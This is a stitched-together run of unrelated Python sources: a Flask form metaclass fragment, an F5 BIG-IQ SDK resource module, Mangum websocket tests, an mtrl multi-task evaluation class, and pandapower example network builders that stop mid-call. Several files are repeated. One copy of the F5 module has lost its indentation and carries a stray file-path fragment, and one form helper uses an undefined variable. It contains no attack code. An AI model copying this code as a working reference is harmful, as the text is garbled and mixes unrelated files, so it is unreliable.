            base_form_type = base.form_type.kwargs["default"]
            form.custom_properties.update(base.custom_properties)
            if base_form_type == "service":
                form.service_fields = [
                    property
                    for property in properties
                    if property not in form.custom_properties
                ]
            if getattr(base, "abstract_service", False):
                form.service_fields.extend(form_properties[base_form_type])
            form_properties[form_type].update(form_properties[base_form_type])
        return form
class BaseForm(FlaskForm, metaclass=MetaForm):
    # Root of all application forms; registration happens in MetaForm.
    pass
def form_postprocessing(form, form_data):
    """Convert a submitted form's raw multidict into a plain dict.

    Each value is coerced according to the field type registered for the
    form's form_type; the result is augmented with the current user and
    any uploaded file.
    """
    data = {**form_data.to_dict(), **{"user": current_user}}
    if request.files:
        data["file"] = request.files["file"]
    for property, field in form_properties[form_data.get("form_type")].items():
        if field["type"] in ("object-list", "multiselect", "multiselect-string"):
            value = form_data.getlist(property)
            if field["type"] == "multiselect-string":
                value = str(value)
            data[property] = value
        elif field["type"] == "object":
            data[property] = form_data.get(property)
        elif field["type"] == "field-list":
            data[property] = []
            for entry in getattr(form, property).entries:
                properties = entry.data
                # default=None so a missing csrf_token (e.g. CSRF disabled)
                # does not raise KeyError, as the bare pop() did
                properties.pop("csrf_token", None)
                data[property].append(properties)
        elif field["type"] == "bool":
            data[property] = property in form_data
        elif field["type"] in db.field_conversion and property in data:
            data[property] = db.field_conversion[field["type"]](form_data[property])
    return data
def choices(iterable):
    """Build (value, label) pairs where the label equals the value."""
    return [(item, item) for item in iterable]
def configure_relationships(*models):
    """Decorator factory: attach a relationship field to the decorated form
    class for each related model named in *models*."""

    def configure_class_relationships(cls):
        form_type = cls.form_type.kwargs["default"]
        for related_model, relation in relationships[form_type].items():
            if related_model not in models:
                continue
            # list relationships get a multi-select field, scalar ones a single
            field = MultipleInstanceField if relation["list"] else InstanceField
            field_type = "object-list" if relation["list"] else "object"
            form_properties[form_type][related_model] = {"type": field_type}
            setattr(cls, related_model, field())
        # BUG FIX: return the class so this works as a decorator; the
        # original returned None, which would rebind the decorated class
        # name to None. (Dataset-join artifact also removed below.)
        return cls

    return configure_class_relationships
from f5.bigip.resource import Collection as BigIpCollection
from f5.bigip.resource import HTTPError
from f5.bigip.resource import OrganizingCollection as BigIpOrganizingCollection
from f5.bigip.resource import PathElement as BigIpPathElement
from f5.bigip.resource import Resource as BigIpResource
from f5.bigip.resource import ResourceBase as BigIpResourceBase
from f5.bigip.resource import UnnamedResource as BigIpUnnamedResource
from f5.sdk_exception import UnsupportedOperation
from f5.sdk_exception import URICreationCollision
class PathElement(BigIpPathElement):
    """Base class to represent a URI path element that does not contain data.

    The BIG-IP® iControl REST API has URIs that are made up of path components
    that do not return data when they are queried. This class represents
    those elements and does not support any of the CURDLE methods that
    the other objects do.
    """

    def __init__(self, container):
        super(PathElement, self).__init__(container)
        # NOTE(review): presumably the minimum product version supporting
        # these ASM endpoints — confirm against the SDK docs
        self._meta_data['minimum_version'] = '5.3.0'
class Resource(BigIpResource, PathElement):
    """A resource that must be loaded by its BIG-IP-generated 'id'."""

    def __init__(self, container):
        super(Resource, self).__init__(container)
        # objects are addressed by the id BIG-IP assigns on creation
        self._meta_data['required_load_parameters'] = {'id', }
class ResourceBase(BigIpResourceBase, PathElement):
    # ResourceBase behaviour plus the path-element defaults above.
    pass


class OrganizingCollection(BigIpOrganizingCollection, ResourceBase):
    # Top-level collection that only groups links to sub-collections.
    pass


class UnnamedResource(BigIpUnnamedResource, ResourceBase):
    # Singleton-style resource addressed without a name.
    pass


class Collection(BigIpCollection, ResourceBase):
    # Standard collection of addressable resources.
    pass
class TaskResource(Resource):
    def __init__(self, container):
        """Call to create a client side object to represent a service URI.

        Call _create or _load for a Resource to have a self._meta_data['uri']!
        """
        super(TaskResource, self).__init__(container)
        # Asm endpoints require object 'id' which is a hash created by BIGIP
        # when object is created.
        self._meta_data['required_load_parameters'] = {'id', }
        # No ASM endpoint supports Stats
        self._meta_data['object_has_stats'] = False
def _load(self, **kwargs):
"""wrapped with load, override that in a subclass to customize"""
if 'uri' in self._meta_data:
error = "There was an attempt to assign a new uri to this " \
"resource, the _meta_data['uri'] is %s and it should" \
" not be changed." % (self._meta_data['uri'])
raise URICreationCollision(error)
requests_params = self._handle_requests_params(kwargs)
self._check_load_parameters(**kwargs)
kwargs['uri_as_parts'] = True
refresh_session = self._meta_data['bigip']._meta_data['icr_session']
uri = self._meta_data['container']._meta_data['uri']
endpoint = kwargs.pop('id', '')
# Popping name kwarg as it will cause the uri to be invalid. We only
# require id parameter
kwargs.pop('name', '')
base_uri = uri + endpoint + '/'
kwargs.update(requests_params)
for key1, key2 in self._meta_data['reduction_forcing_pairs']:
kwargs = self._reduce_boolean_pair(kwargs, key1, key2)
response = refresh_session.get(base_uri, **kwargs)
# Make new instance of self
return self._produce_instance(response)
def load(self, **kwargs):
"""Load an already configured service into this instance.
This method uses HTTP GET to obtain a resource from the BIG-IP®.
..
The URI of the target service is constructed from the instance's
container and **kwargs.
kwargs typically for ASM requires "id" in majority of cases,
as object links in ASM are using hash(id) instead of names,
this may, or may not, be true for a specific service.
:param kwargs: typically contains "id"
NOTE: If kwargs has a 'requests_params' key the corresponding dict will
be passed to the underlying requests.session.get method where it will
be handled according to that API. THIS IS HOW TO PASS QUERY-ARGS!
:returns: a Resource Instance (with a populated _meta_data['uri'])
"""
return self._load(**kwargs)
def _delete(self, **kwargs):
"""wrapped with delete, override that in a subclass to customize """
requests_params = self._handle_requests_params(kwargs)
delete_uri = self._meta_data['uri']
session = self._meta_data['bigip']._meta_data['icr_session']
response = session.delete(delete_uri, **requests_params)
if response.status_code == 200 or 201:
self.__dict__ = {'deleted': True}
def delete(self, **kwargs):
"""Delete the Task resource on the BIG-IP®.
Uses HTTP DELETE to delete the Task resource on the BIG-IP®.
After this method is called, and status_code 200 or 201 response is
received ``instance.__dict__`` is replace with ``{'deleted': True}``
:param kwargs: The only current use is to pass kwargs to the requests
API. If kwargs has a 'requests_params' key the corresponding dict will
be passed to the underlying requests.session.delete method where it
will be handled according to that API. THIS IS HOW TO PASS QUERY-ARGS!
"""
# Need to implement checking for ? here.
self._delete(**kwargs)
# Need to implement correct teardown here.
def exists(self, **kwargs):
"""Check for the existence of the Task object on the BIG-IP
Sends an HTTP GET to the URI of the ASM object and if it fails with
a :exc:~requests.HTTPError` exception it checks the exception for
status code of 404 and returns :obj:`False` in that case.
If the GET is successful it returns :obj:`True`.
For any other errors are raised as-is.
:param kwargs: Keyword arguments required to get objects
NOTE: If kwargs has a 'requests_params' key the corresponding dict will
be passed to the underlying requests.session.get method where it will
be handled according to that API. THIS IS HOW TO PASS QUERY-ARGS!
:returns: bool -- The objects exists on BIG-IP® or not.
:raises: :exc:`requests.HTTPError`, Any HTTP error that was not status
code 404.
"""
requests_params = self._handle_requests_params(kwargs)
self._check_load_parameters(**kwargs)
kwargs['uri_as_parts'] = True
session = self._meta_data['bigip']._meta_data['icr_session']
uri = self._meta_data['container']._meta_data['uri']
endpoint = kwargs.pop('id', '')
# Popping name kwarg as it will cause the uri to be invalid
kwargs.pop('name', '')
base_uri = uri + endpoint + '/'
kwargs.update(requests_params)
try:
session.get(base_uri, **kwargs)
except HTTPError as err:
if err.response.status_code == 404:
return False
else:
raise
return True
def update(self, **kwargs):
"""Update is not supported for ASM Resources
:raises: UnsupportedOperation
"""
raise UnsupportedOperation(
"%s does not support the update method" % self.__class__.__name__
) | f5/bigiq/resource.py |
from f5.bigip.resource import Collection as BigIpCollection
from f5.bigip.resource import HTTPError
from f5.bigip.resource import OrganizingCollection as BigIpOrganizingCollection
from f5.bigip.resource import PathElement as BigIpPathElement
from f5.bigip.resource import Resource as BigIpResource
from f5.bigip.resource import ResourceBase as BigIpResourceBase
from f5.bigip.resource import UnnamedResource as BigIpUnnamedResource
from f5.sdk_exception import UnsupportedOperation
from f5.sdk_exception import URICreationCollision
class PathElement(BigIpPathElement):
    """Base class to represent a URI path element that does not contain data.

    The BIG-IP® iControl REST API has URIs that are made up of path components
    that do not return data when they are queried. This class represents
    those elements and does not support any of the CURDLE methods that
    the other objects do.
    """
    def __init__(self, container):
        super(PathElement, self).__init__(container)
        # Endpoints modelled here require BIG-IQ 5.3.0 or newer.
        self._meta_data['minimum_version'] = '5.3.0'
class Resource(BigIpResource, PathElement):
    """Data-bearing resource that must be loaded via its ``id`` hash."""
    def __init__(self, container):
        super(Resource, self).__init__(container)
        # Loading is keyed on the device-generated 'id', not on a name.
        self._meta_data['required_load_parameters'] = {'id', }
class ResourceBase(BigIpResourceBase, PathElement):
    """BIG-IP ResourceBase behaviour plus :class:`PathElement` gating."""
    pass
class OrganizingCollection(BigIpOrganizingCollection, ResourceBase):
    """BIG-IQ flavour of an organizing collection (URI grouping node)."""
    pass
class UnnamedResource(BigIpUnnamedResource, ResourceBase):
    """BIG-IQ flavour of a resource addressed without a name."""
    pass
class Collection(BigIpCollection, ResourceBase):
    """BIG-IQ flavour of a collection of resources."""
    pass
class TaskResource(Resource):
    """Task-style resource addressed by a BIG-IP-generated ``id`` hash.

    ASM-style endpoints identify objects by an opaque ``id`` assigned by
    the device rather than by name, and they expose no Stats component.
    """

    def __init__(self, container):
        """Call to create a client side object to represent a service URI.

        Call _create or _load for a Resource to have a
        self._meta_data['uri']!
        """
        super(TaskResource, self).__init__(container)
        # Asm endpoints require object 'id' which is a hash created by BIGIP
        # when object is created.
        self._meta_data['required_load_parameters'] = {'id', }
        # No ASM endpoint supports Stats
        self._meta_data['object_has_stats'] = False

    def _load(self, **kwargs):
        """wrapped with load, override that in a subclass to customize"""
        # A 'uri' in _meta_data means this object already represents a
        # device-side resource; loading again would clobber it.
        if 'uri' in self._meta_data:
            error = "There was an attempt to assign a new uri to this " \
                    "resource, the _meta_data['uri'] is %s and it should" \
                    " not be changed." % (self._meta_data['uri'])
            raise URICreationCollision(error)
        requests_params = self._handle_requests_params(kwargs)
        self._check_load_parameters(**kwargs)
        kwargs['uri_as_parts'] = True
        refresh_session = self._meta_data['bigip']._meta_data['icr_session']
        uri = self._meta_data['container']._meta_data['uri']
        endpoint = kwargs.pop('id', '')
        # Popping name kwarg as it will cause the uri to be invalid. We only
        # require id parameter
        kwargs.pop('name', '')
        base_uri = uri + endpoint + '/'
        kwargs.update(requests_params)
        for key1, key2 in self._meta_data['reduction_forcing_pairs']:
            kwargs = self._reduce_boolean_pair(kwargs, key1, key2)
        response = refresh_session.get(base_uri, **kwargs)
        # Make new instance of self
        return self._produce_instance(response)

    def load(self, **kwargs):
        """Load an already configured service into this instance.

        This method uses HTTP GET to obtain a resource from the BIG-IP®.
        The URI of the target service is constructed from the instance's
        container and **kwargs.  kwargs typically requires "id" for ASM,
        as object links in ASM use hash(id) instead of names; this may,
        or may not, be true for a specific service.

        :param kwargs: typically contains "id"

        NOTE: If kwargs has a 'requests_params' key the corresponding dict will
        be passed to the underlying requests.session.get method where it will
        be handled according to that API. THIS IS HOW TO PASS QUERY-ARGS!

        :returns: a Resource Instance (with a populated _meta_data['uri'])
        """
        return self._load(**kwargs)

    def _delete(self, **kwargs):
        """wrapped with delete, override that in a subclass to customize """
        requests_params = self._handle_requests_params(kwargs)
        delete_uri = self._meta_data['uri']
        session = self._meta_data['bigip']._meta_data['icr_session']
        response = session.delete(delete_uri, **requests_params)
        # BUG FIX: the original condition ``status_code == 200 or 201`` was
        # always true because the bare literal 201 is truthy on its own;
        # test membership in both success codes instead.
        if response.status_code in (200, 201):
            self.__dict__ = {'deleted': True}

    def delete(self, **kwargs):
        """Delete the Task resource on the BIG-IP®.

        Uses HTTP DELETE to delete the Task resource on the BIG-IP®.
        After this method is called, and a status_code 200 or 201 response
        is received, ``instance.__dict__`` is replaced with
        ``{'deleted': True}``.

        :param kwargs: The only current use is to pass kwargs to the requests
         API. If kwargs has a 'requests_params' key the corresponding dict
         will be passed to the underlying requests.session.delete method
         where it will be handled according to that API. THIS IS HOW TO
         PASS QUERY-ARGS!
        """
        # Need to implement checking for ? here.
        self._delete(**kwargs)
        # Need to implement correct teardown here.

    def exists(self, **kwargs):
        """Check for the existence of the Task object on the BIG-IP.

        Sends an HTTP GET to the URI of the ASM object and if it fails with
        a :exc:`requests.HTTPError` exception it checks the exception for
        status code of 404 and returns :obj:`False` in that case.
        If the GET is successful it returns :obj:`True`.
        Any other errors are raised as-is.

        :param kwargs: Keyword arguments required to get objects

        NOTE: If kwargs has a 'requests_params' key the corresponding dict will
        be passed to the underlying requests.session.get method where it will
        be handled according to that API. THIS IS HOW TO PASS QUERY-ARGS!

        :returns: bool -- The objects exists on BIG-IP® or not.
        :raises: :exc:`requests.HTTPError`, Any HTTP error that was not status
         code 404.
        """
        requests_params = self._handle_requests_params(kwargs)
        self._check_load_parameters(**kwargs)
        kwargs['uri_as_parts'] = True
        session = self._meta_data['bigip']._meta_data['icr_session']
        uri = self._meta_data['container']._meta_data['uri']
        endpoint = kwargs.pop('id', '')
        # Popping name kwarg as it will cause the uri to be invalid
        kwargs.pop('name', '')
        base_uri = uri + endpoint + '/'
        kwargs.update(requests_params)
        try:
            session.get(base_uri, **kwargs)
        except HTTPError as err:
            if err.response.status_code == 404:
                return False
            else:
                raise
        return True

    def update(self, **kwargs):
        """Update is not supported for ASM Resources

        :raises: UnsupportedOperation
        """
        raise UnsupportedOperation(
            "%s does not support the update method" % self.__class__.__name__
        )
import mock
from mangum import Mangum
def test_websocket_close(tmp_path, mock_ws_connect_event, mock_ws_send_event) -> None:
    """An app that closes during the handshake yields 403 on a later send."""
    dsn = f"sqlite://{tmp_path}/mangum.sqlite3"

    async def app(scope, receive, send):
        # Immediately close any websocket connection at the connect event.
        if scope["type"] != "websocket":
            return
        while True:
            event = await receive()
            if event["type"] == "websocket.connect":
                await send({"type": "websocket.close"})

    handler = Mangum(app, dsn=dsn)
    assert handler(mock_ws_connect_event, {}) == {"statusCode": 200}

    with mock.patch("mangum.websocket.WebSocket.post_to_connection") as post:
        post.return_value = None
        assert handler(mock_ws_send_event, {}) == {"statusCode": 403}
def test_websocket_disconnect(
    tmp_path, mock_ws_connect_event, mock_ws_send_event, mock_websocket_app
) -> None:
    """Connect then send through the stock websocket app; both return 200."""
    dsn = f"sqlite://{tmp_path}/mangum.sqlite3"
    handler = Mangum(mock_websocket_app, dsn=dsn)
    assert handler(mock_ws_connect_event, {}) == {"statusCode": 200}
    with mock.patch("mangum.websocket.WebSocket.post_to_connection") as post:
        post.return_value = None
        assert handler(mock_ws_send_event, {}) == {"statusCode": 200}
def test_websocket_exception(
    tmp_path, mock_ws_connect_event, mock_ws_send_event
) -> None:
    """An app that raises produces a 500 response for the send event."""
    dsn = f"sqlite://{tmp_path}/mangum.sqlite3"

    async def app(scope, receive, send):
        raise Exception()

    # Connect with one handler instance, then send through a fresh one.
    Mangum(app, dsn=dsn)(mock_ws_connect_event, {})
    send_handler = Mangum(app, dsn=dsn)
    assert send_handler(mock_ws_send_event, {}) == {"statusCode": 500}
def test_websocket_unexpected_message_error(
    tmp_path, mock_ws_connect_event, mock_ws_send_event
) -> None:
    """A message type outside the ASGI websocket spec results in a 500."""
    dsn = f"sqlite://{tmp_path}/mangum.sqlite3"

    async def app(scope, receive, send):
        # 'websocket.oops' is not a valid ASGI websocket message type.
        await send({"type": "websocket.oops", "subprotocol": None})

    # Connect with one handler instance, then send through a fresh one.
    Mangum(app, dsn=dsn)(mock_ws_connect_event, {})
    send_handler = Mangum(app, dsn=dsn)
    assert send_handler(mock_ws_send_event, {}) == {"statusCode": 500}
def test_websocket_without_body(
    tmp_path, mock_ws_connect_event, mock_ws_send_event, mock_websocket_app
) -> None:
    """A send event lacking a 'body' key is still handled with a 200."""
    dsn = f"sqlite://{tmp_path}/mangum.sqlite3"
    handler = Mangum(mock_websocket_app, dsn=dsn)
    response = handler(mock_ws_connect_event, {})
    assert response == {"statusCode": 200}
    with mock.patch("mangum.websocket.WebSocket.post_to_connection") as send:
        send.return_value = None
        # Remove the body entirely to exercise the missing-key path.
        del mock_ws_send_event["body"]
        response = handler(mock_ws_send_event, {})
        assert response == {"statusCode": 200}
from mangum import Mangum
def test_websocket_close(tmp_path, mock_ws_connect_event, mock_ws_send_event) -> None:
    """If the app closes during the handshake, a later send event gets 403."""
    dsn = f"sqlite://{tmp_path}/mangum.sqlite3"
    async def app(scope, receive, send):
        # Immediately close any websocket connection at the connect event.
        if scope["type"] == "websocket":
            while True:
                message = await receive()
                if message["type"] == "websocket.connect":
                    await send({"type": "websocket.close"})
    handler = Mangum(app, dsn=dsn)
    response = handler(mock_ws_connect_event, {})
    assert response == {"statusCode": 200}
    with mock.patch("mangum.websocket.WebSocket.post_to_connection") as send:
        send.return_value = None
        response = handler(mock_ws_send_event, {})
        assert response == {"statusCode": 403}
def test_websocket_disconnect(
    tmp_path, mock_ws_connect_event, mock_ws_send_event, mock_websocket_app
) -> None:
    """Connect then send through the stock websocket app; both return 200."""
    dsn = f"sqlite://{tmp_path}/mangum.sqlite3"
    handler = Mangum(mock_websocket_app, dsn=dsn)
    response = handler(mock_ws_connect_event, {})
    assert response == {"statusCode": 200}
    with mock.patch("mangum.websocket.WebSocket.post_to_connection") as send:
        send.return_value = None
        response = handler(mock_ws_send_event, {})
        assert response == {"statusCode": 200}
def test_websocket_exception(
    tmp_path, mock_ws_connect_event, mock_ws_send_event
) -> None:
    """An app that raises produces a 500 response for the send event."""
    async def app(scope, receive, send):
        raise Exception()
    dsn = f"sqlite://{tmp_path}/mangum.sqlite3"
    handler = Mangum(app, dsn=dsn)
    handler(mock_ws_connect_event, {})
    # A fresh handler is used for the send phase.
    handler = Mangum(app, dsn=dsn)
    response = handler(mock_ws_send_event, {})
    assert response == {"statusCode": 500}
def test_websocket_unexpected_message_error(
    tmp_path, mock_ws_connect_event, mock_ws_send_event
) -> None:
    """A message type outside the ASGI websocket spec results in a 500."""
    async def app(scope, receive, send):
        # 'websocket.oops' is not a valid ASGI websocket message type.
        await send({"type": "websocket.oops", "subprotocol": None})
    dsn = f"sqlite://{tmp_path}/mangum.sqlite3"
    handler = Mangum(app, dsn=dsn)
    handler(mock_ws_connect_event, {})
    # A fresh handler is used for the send phase.
    handler = Mangum(app, dsn=dsn)
    response = handler(mock_ws_send_event, {})
    assert response == {"statusCode": 500}
def test_websocket_without_body(
    tmp_path, mock_ws_connect_event, mock_ws_send_event, mock_websocket_app
) -> None:
    """A send event lacking a 'body' key is still handled with a 200."""
    dsn = f"sqlite://{tmp_path}/mangum.sqlite3"
    handler = Mangum(mock_websocket_app, dsn=dsn)
    response = handler(mock_ws_connect_event, {})
    assert response == {"statusCode": 200}
    with mock.patch("mangum.websocket.WebSocket.post_to_connection") as send:
        send.return_value = None
        # Remove the body entirely to exercise the missing-key path.
        del mock_ws_send_event["body"]
        response = handler(mock_ws_send_event, {})
        assert response == {"statusCode": 200}
"""Class to interface with an Experiment"""
from typing import List
import numpy as np
from mtenv.utils.types import ObsType
from mtrl.agent import utils as agent_utils
from mtrl.env.vec_env import VecEnv # type: ignore[attr-defined]
from mtrl.experiment import multitask
from mtrl.utils.types import ConfigType, TensorType
class Experiment(multitask.Experiment):
    """Multi-task experiment variant evaluated on a vectorized env."""

    def __init__(self, config: ConfigType, experiment_id: str = "0"):
        """Experiment Class to manage the lifecycle of a multi-task model.

        Args:
            config (ConfigType):
            experiment_id (str, optional): Defaults to "0".
        """
        super().__init__(config, experiment_id)

    def get_action_when_evaluating_vec_env_of_tasks(
        self, multitask_obs: ObsType, modes: List[str]
    ) -> TensorType:
        """Select an evaluation action with the agent in eval mode."""
        agent = self.agent
        # eval_mode disables training-time behaviour while sampling.
        with agent_utils.eval_mode(agent):
            action = agent.select_action(multitask_obs=multitask_obs, modes=modes)
        return action

    def evaluate_vec_env_of_tasks(self, vec_env: VecEnv, step: int, episode: int):
        """Evaluate the agent's performance on the different environments,
        vectorized as a single instance of vectorized environment.

        Since we are evaluating on multiple tasks, we track additional
        metadata to track which metric corresponds to which task.

        Args:
            vec_env (VecEnv): vectorized environment.
            step (int): step for tracking the training of the agent.
            episode (int): episode for tracking the training of the agent.
        """
        for mode in self.eval_modes_to_env_ids:
            self.logger.log(f"{mode}/episode", episode, step)
        # Per-env accumulators: reward sum, 1/0 "still running" mask, done flag.
        episode_reward, mask, done = [
            np.full(shape=vec_env.num_envs, fill_value=fill_value)
            for fill_value in [0.0, 1.0, False]
        ]  # (num_envs, 1)
        multitask_obs = vec_env.reset()  # (num_envs, 9, 84, 84)
        offset = self.config.experiment.num_eval_episodes
        while not np.all(done):
            action = self.get_action_when_evaluating_vec_env_of_tasks(
                multitask_obs=multitask_obs, modes=vec_env.mode
            )
            multitask_obs, reward, done, _ = vec_env.step(action)
            # NOTE(review): the mask is zeroed *before* accumulating, so the
            # reward of the terminating step is excluded from the episode
            # total -- confirm this matches the intended eval protocol.
            mask = mask * (1 - done.astype(int))
            episode_reward += reward * mask
        start_index = 0
        for mode in self.eval_modes_to_env_ids:
            num_envs = len(self.eval_modes_to_env_ids[mode])
            # Mean reward over all eval episodes of all envs in this mode.
            self.logger.log(
                f"{mode}/episode_reward",
                episode_reward[start_index : start_index + offset * num_envs].mean(),
                step,
            )
            for _current_env_index, _current_env_id in enumerate(
                self.eval_modes_to_env_ids[mode]
            ):
                # Per-environment mean over its `offset` eval episodes.
                self.logger.log(
                    f"{mode}/episode_reward_env_index_{_current_env_index}",
                    episode_reward[
                        start_index
                        + _current_env_index * offset : start_index
                        + (_current_env_index + 1) * offset
                    ].mean(),
                    step,
                )
                self.logger.log(
                    f"{mode}/env_index_{_current_env_index}", _current_env_id, step
                )
            start_index += offset * num_envs
        self.logger.dump(step)
from typing import List
import numpy as np
from mtenv.utils.types import ObsType
from mtrl.agent import utils as agent_utils
from mtrl.env.vec_env import VecEnv # type: ignore[attr-defined]
from mtrl.experiment import multitask
from mtrl.utils.types import ConfigType, TensorType
class Experiment(multitask.Experiment):
    """Multi-task experiment variant evaluated on a vectorized env."""

    def __init__(self, config: ConfigType, experiment_id: str = "0"):
        """Experiment Class to manage the lifecycle of a multi-task model.

        Args:
            config (ConfigType):
            experiment_id (str, optional): Defaults to "0".
        """
        super().__init__(config, experiment_id)

    def get_action_when_evaluating_vec_env_of_tasks(
        self, multitask_obs: ObsType, modes: List[str]
    ) -> TensorType:
        """Select an evaluation action with the agent in eval mode."""
        agent = self.agent
        # eval_mode disables training-time behaviour while sampling.
        with agent_utils.eval_mode(agent):
            action = agent.select_action(multitask_obs=multitask_obs, modes=modes)
        return action

    def evaluate_vec_env_of_tasks(self, vec_env: VecEnv, step: int, episode: int):
        """Evaluate the agent's performance on the different environments,
        vectorized as a single instance of vectorized environment.

        Since we are evaluating on multiple tasks, we track additional
        metadata to track which metric corresponds to which task.

        Args:
            vec_env (VecEnv): vectorized environment.
            step (int): step for tracking the training of the agent.
            episode (int): episode for tracking the training of the agent.
        """
        for mode in self.eval_modes_to_env_ids:
            self.logger.log(f"{mode}/episode", episode, step)
        # Per-env accumulators: reward sum, 1/0 "still running" mask, done flag.
        episode_reward, mask, done = [
            np.full(shape=vec_env.num_envs, fill_value=fill_value)
            for fill_value in [0.0, 1.0, False]
        ]  # (num_envs, 1)
        multitask_obs = vec_env.reset()  # (num_envs, 9, 84, 84)
        offset = self.config.experiment.num_eval_episodes
        while not np.all(done):
            action = self.get_action_when_evaluating_vec_env_of_tasks(
                multitask_obs=multitask_obs, modes=vec_env.mode
            )
            multitask_obs, reward, done, _ = vec_env.step(action)
            # NOTE(review): the mask is zeroed *before* accumulating, so the
            # reward of the terminating step is excluded from the episode
            # total -- confirm this matches the intended eval protocol.
            mask = mask * (1 - done.astype(int))
            episode_reward += reward * mask
        start_index = 0
        for mode in self.eval_modes_to_env_ids:
            num_envs = len(self.eval_modes_to_env_ids[mode])
            # Mean reward over all eval episodes of all envs in this mode.
            self.logger.log(
                f"{mode}/episode_reward",
                episode_reward[start_index : start_index + offset * num_envs].mean(),
                step,
            )
            for _current_env_index, _current_env_id in enumerate(
                self.eval_modes_to_env_ids[mode]
            ):
                # Per-environment mean over its `offset` eval episodes.
                self.logger.log(
                    f"{mode}/episode_reward_env_index_{_current_env_index}",
                    episode_reward[
                        start_index
                        + _current_env_index * offset : start_index
                        + (_current_env_index + 1) * offset
                    ].mean(),
                    step,
                )
                self.logger.log(
                    f"{mode}/env_index_{_current_env_index}", _current_env_id, step
                )
            start_index += offset * num_envs
        self.logger.dump(step)
# Copyright (c) 2016 by University of Kassel and Fraunhofer Institute for Wind Energy and Energy
# System Technology (IWES), Kassel. All rights reserved. Use of this source code is governed by a
# BSD-style license that can be found in the LICENSE file.
import pandapower as pp
def panda_four_load_branch():
    """
    This function creates a simple six bus system with four radial low voltage nodes connected to \
    a medium valtage slack bus. At every low voltage node the same load is connected.

    RETURN:
        **net** - Returns the required four load system

    EXAMPLE:
        import pandapower.networks as pn

        net_four_load = pn.panda_four_load_branch()
    """
    net = pp.create_empty_network()
    # Bus creation order is preserved so element indices match the
    # original layout: one MV slack bus followed by five LV buses.
    mv_bus = pp.create_bus(net, name="bus1", vn_kv=10.)
    lv_buses = [pp.create_bus(net, name="bus%d" % num, vn_kv=.4)
                for num in range(2, 7)]
    pp.create_ext_grid(net, mv_bus)
    pp.create_transformer(net, mv_bus, lv_buses[0], std_type="0.25 MVA 10/0.4 kV")
    # Chain the LV buses with identical line segments.
    for num, (from_bus, to_bus) in enumerate(zip(lv_buses[:-1], lv_buses[1:]), 1):
        pp.create_line(net, from_bus, to_bus, name="line%d" % num, length_km=0.05,
                       std_type="NAYY 4x120 SE")
    # Identical loads on every LV bus downstream of the transformer bus.
    for load_bus in lv_buses[1:]:
        pp.create_load(net, load_bus, 30, 10)
    return net
def four_loads_with_branches_out():
    """
    This function creates a simple ten bus system with four radial low voltage nodes connected to \
    a medium valtage slack bus. At every of the four radial low voltage nodes another low voltage \
    node with a load is connected via cable.

    RETURN:
        **net** - Returns the required four load system with branches

    EXAMPLE:
        import pandapower.networks as pn

        net_four_load_with_branches = pn.four_loads_with_branches_out()
    """
    net = pp.create_empty_network()
    # Element creation order matches the original exactly so bus/line
    # indices are unchanged.
    slack_bus = pp.create_bus(net, name="bus1ref", vn_kv=10.)
    pp.create_ext_grid(net, slack_bus)
    feeder = [pp.create_bus(net, name="bus2", vn_kv=.4)]
    pp.create_transformer(net, slack_bus, feeder[0], std_type="0.25 MVA 10/0.4 kV")
    # Main LV feeder: bus3..bus6 chained by line1..line4.
    for idx in range(1, 5):
        feeder.append(pp.create_bus(net, name="bus%d" % (idx + 2), vn_kv=.4))
        pp.create_line(net, feeder[idx - 1], feeder[idx], name="line%d" % idx,
                       length_km=0.05, std_type="NAYY 4x120 SE")
    # One branch bus (bus7..bus10) per feeder bus, via line5..line8.
    branch_buses = []
    for idx in range(4):
        branch_buses.append(pp.create_bus(net, name="bus%d" % (idx + 7), vn_kv=.4))
        pp.create_line(net, feeder[idx + 1], branch_buses[idx],
                       name="line%d" % (idx + 5), length_km=0.05,
                       std_type="NAYY 4x120 SE")
    for load_bus in branch_buses:
        pp.create_load(net, load_bus, p_kw=30, q_kvar=10)
    return net
def simple_four_bus_system():
    """
    This function creates a simple four bus system with two radial low voltage nodes connected to \
    a medium valtage slack bus. At both low voltage nodes the a load and a static generator is \
    connected.

    RETURN:
        **net** - Returns the required four bus system

    EXAMPLE:
        import pandapower.networks as pn

        net_simple_four_bus = pn.simple_four_bus_system()
    """
    net = pp.create_empty_network()
    slack_bus = pp.create_bus(net, name="bus1ref", vn_kv=10)
    pp.create_ext_grid(net, slack_bus)
    trafo_lv_bus = pp.create_bus(net, name="bus2", vn_kv=.4)
    pp.create_transformer(net, slack_bus, trafo_lv_bus, name="transformer",
                          std_type="0.25 MVA 10/0.4 kV")
    # Two radial LV buses, each with a load and a static generator (PV).
    pv_bus_1 = pp.create_bus(net, name="bus3", vn_kv=.4)
    pp.create_line(net, trafo_lv_bus, pv_bus_1, name="line1", length_km=0.50000,
                   std_type="NAYY 4x50 SE")
    pv_bus_2 = pp.create_bus(net, name="bus4", vn_kv=.4)
    pp.create_line(net, pv_bus_1, pv_bus_2, name="line2", length_km=0.50000,
                   std_type="NAYY 4x50 SE")
    pp.create_load(net, pv_bus_1, 30, 10, name="load1")
    pp.create_load(net, pv_bus_2, 30, 10, name="load2")
    pp.create_sgen(net, pv_bus_1, p_kw=-20., q_kvar=-5., name="pv1", sn_kva=30)
    pp.create_sgen(net, pv_bus_2, p_kw=-15., q_kvar=-2., name="pv2", sn_kva=20)
    return net
def simple_mv_open_ring_net():
    """
    This function creates a simple medium voltage open ring network with loads at every medium \
    voltage node.
    As an example this function is used in the topology and diagnostic docu.

    RETURN:
        **net** - Returns the required simple medium voltage open ring network

    EXAMPLE:
        import pandapower.networks as pn

        net_simple_open_ring = pn.simple_mv_open_ring_net()
    """
    net = pp.create_empty_network()
    # Bus 0 is the 110 kV feed-in; buses 1-6 form the 20 kV ring.
    pp.create_bus(net, name="110 kV bar", vn_kv=110, type='b')
    pp.create_bus(net, name="20 kV bar", vn_kv=20, type='b')
    pp.create_bus(net, name="bus 2", vn_kv=20, type='b')
    pp.create_bus(net, name="bus 3", vn_kv=20, type='b')
    pp.create_bus(net, name="bus 4", vn_kv=20, type='b')
    pp.create_bus(net, name="bus 5", vn_kv=20, type='b')
    pp.create_bus(net, name="bus 6", vn_kv=20, type='b')
    pp.create_ext_grid(net, 0, vm_pu=1)
    pp.create_line(net, name="line 0", from_bus=1, to_bus=2, length_km=1,
                   std_type="NA2XS2Y 1x185 RM/25 12/20 kV")
    pp.create_line(net, name="line 1", from_bus=2, to_bus=3, length_km=1,
                   std_type="NA2XS2Y 1x185 RM/25 12/20 kV")
    pp.create_line(net, name="line 2", from_bus=3, to_bus=4, length_km=1,
